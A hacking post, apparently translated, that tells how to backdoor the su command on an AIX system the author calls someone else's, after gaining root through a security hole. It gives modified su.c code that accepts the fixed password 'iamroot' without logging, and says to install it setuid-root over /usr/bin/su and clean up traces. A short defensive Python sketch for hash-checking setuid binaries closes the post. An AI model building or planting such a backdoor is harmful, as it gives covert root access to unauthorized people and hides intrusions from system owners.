These days I wanted to leave a back door on someone else's AIX system (root privileges had been obtained through a legitimate ordinary user account and a security hole in the system). Unlike Linux and FreeBSD, however, IBM's AIX is not open, and there are few tools online that target AIX. In the end I decided to replace the AIX su. I tried to find su source code on the Internet, but could not find any. Fortunately, I have a few other Unix hosts (FreeBSD, AIX, Solaris :) and have root privileges on all of them, so I tried porting the FreeBSD su source code to AIX. I would like to point out that I am not a programmer, so my understanding of the su source code may be wrong.

Environment:

1. FreeBSD 4.5-Release + gcc 2.95.3
2. IBM AIX 4.3.3 + gcc 2.9-aix51-020209

Note: gcc for AIX was downloaded from http://www-1.ibm.com/servers/aix/products/aixos/linux/download.html and installed on the AIX system following the steps in ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/README.txt.

Process:

1. Install the FreeBSD source package. The su source code is under /usr/src/usr.bin/su/ (or download it directly from the corresponding path on the FreeBSD FTP site). Copy the Makefile and su.c from this directory to another directory on FreeBSD and run make; make install. It compiles and installs /usr/bin/su successfully!

2. Pack the Makefile and su.c and transfer them to AIX, unpack them into a directory and run make. Errors appear, mainly because of function differences between the two platforms. When debugging, refer to the .h files under /usr/include/ to correct the mistakes. AIX does not support Kerberos, SKEY or WHEEL_SU, so remove this redundant code. The AIX getopt function is also a bit different from the FreeBSD getopt, so the FreeBSD /usr/src/lib/libstand/getopt.c needs to be ported as well. Once these tasks are complete, su can basically be compiled under AIX.

3. The su compiled this way can now replace the AIX su and work. But we have not yet left a back door in su.
Reading the source code carefully, you can find this code in su.c:

    /* if the target account has a password, ask for it and verify it */
    if (*pwd->pw_passwd) {
        p = getpass("Password:");
        /* strcmp() returns non-zero when the hashes differ: reject and log */
        if (strcmp(pwd->pw_passwd, crypt(p, pwd->pw_passwd))) {
            fprintf(stderr, "Sorry\n");
            syslog(LOG_AUTH | LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty());
            exit(1);
        }
    }
Adding the back door:

    if (*pwd->pw_passwd) {
        p = getpass("Password:");
        /* the second comparison accepts a fixed string, so the
           "BAD SU" warning below is not logged for it */
        if (!(!strcmp(pwd->pw_passwd, crypt(p, pwd->pw_passwd)) || !strcmp(p, "iamroot"))) {
            fprintf(stderr, "Sorry\n");
            syslog(LOG_AUTH | LOG_WARNING, "BAD SU %s to %s%s", username, user, ontty());
            exit(1);
        }
    }
Run make; chmod 4555 su, and then try using the su you compiled yourself to switch to root: entering either the root user's password or iamroot will switch to root! Do some tests to make sure your su program works on the AIX system! Then replace the original su program in /usr/bin with your copy. Do not forget to clean up the site.
Attachment: aix-su.tar.gz, successfully tested under AIX 4.3.3 + gcc 2.9-aix51-020209
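
From the defender's side, the replacement described above changes the contents of a setuid-root binary while its mode (4555), owner and even size can be kept identical, and a login with the fixed string never reaches the "BAD SU" syslog call, so log review alone will not show it. The Python sketch below is an added example, not code from the original post: it compares a privileged binary against a trusted baseline record; the function names and the temporary file standing in for /usr/bin/su are constructed, and it assumes the baseline was taken from known-good media and is kept off the host.

```python
import hashlib
import os
import stat
import tempfile

FIELDS = ("sha256", "size", "mode", "uid", "regular")

def fingerprint(path):
    """Record the attributes of a privileged binary that matter for integrity."""
    st = os.lstat(path)  # lstat: a symlink swapped in for the file is itself a finding
    with open(path, "rb") as fh:
        digest = hashlib.sha256(fh.read()).hexdigest()
    return {"sha256": digest, "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid,
            "regular": stat.S_ISREG(st.st_mode)}

def compare(baseline, path):
    """Return the list of fields that differ from the trusted baseline."""
    try:
        current = fingerprint(path)
    except FileNotFoundError:
        return ["missing"]
    return [f for f in FIELDS if current[f] != baseline[f]]

def write_image(path, data):
    """Install constructed file contents with mode 4555 via rename."""
    tmp = path + ".new"
    with open(tmp, "wb") as fh:
        fh.write(data)
    os.chmod(tmp, 0o4555)
    os.replace(tmp, path)

def demo():
    """Constructed scenario: same size, mode and owner, different contents."""
    with tempfile.TemporaryDirectory() as d:
        su = os.path.join(d, "su")       # stand-in for /usr/bin/su
        write_image(su, b"A" * 64)       # constructed "vendor" image
        baseline = fingerprint(su)       # in practice: recorded from trusted media
        before = compare(baseline, su)
        write_image(su, b"B" * 64)       # constructed replacement image
        after = compare(baseline, su)
        return before, after

if __name__ == "__main__":
    print(demo())
```

Only the hash differs in the constructed scenario, which is why size, mode and timestamp checks are not sufficient on their own for setuid binaries.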